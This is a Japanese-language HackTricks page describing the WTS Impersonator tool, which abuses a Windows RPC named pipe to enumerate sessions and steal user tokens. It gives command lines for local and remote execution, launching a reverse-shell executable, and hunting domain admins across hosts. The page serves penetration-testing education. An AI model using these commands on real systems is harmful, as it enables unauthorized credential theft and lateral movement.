hacktricks/windows-hardening/stealing-credentials/WTS-Impersonator.md

3.8 KiB
Raw Blame History

ゼロからヒーローまでAWSハッキングを学ぶ htARTEHackTricks AWS Red Team Expert

HackTricksをサポートする他の方法

WTS Impersonatorツールは、"\pipe\LSM_API_service" RPC名前付きパイプを悪用して、ログインしているユーザーを秘密裏に列挙し、トークンを乗っ取り、従来のトークン権限昇格技術をバイパスします。このアプローチにより、ネットワーク内でのシームレスな横断移動が可能となります。この技術の革新は、Omri Basoによるもので、その作業はGitHubでアクセス可能です。

コア機能

このツールは、一連のAPI呼び出しを介して動作します

WTSEnumerateSessionsA  WTSQuerySessionInformationA  WTSQueryUserToken  CreateProcessAsUserW

キー モジュールと使用方法

  • ユーザーの列挙: ツールを使用して、ローカルおよびリモートユーザーの列挙が可能です。それぞれのシナリオに対応するコマンドを使用します:
  • ローカルでの実行:
.\WTSImpersonator.exe -m enum
  • IPアドレスまたはホスト名を指定してリモートでの実行:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
  • コマンドの実行: exec および exec-remote モジュールは、Service コンテキストが必要です。ローカル実行では、WTSImpersonator実行可能ファイルとコマンドが必要です:
  • ローカルコマンドの実行例:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
  • サービスコンテキストを取得するために PsExec64.exe を使用できます:
.\PsExec64.exe -accepteula -s cmd.exe
  • リモートコマンドの実行: PsExec.exe と同様に、適切な権限で実行を許可するサービスをリモートで作成およびインストールします。
  • リモート実行の例:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
  • ユーザーハンティングモジュール: 複数のマシンで特定のユーザーをターゲットにし、彼らの資格情報でコードを実行します。これは、複数のシステムでローカル管理者権限を持つドメイン管理者をターゲットにする際に特に有用です。
  • 使用例:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe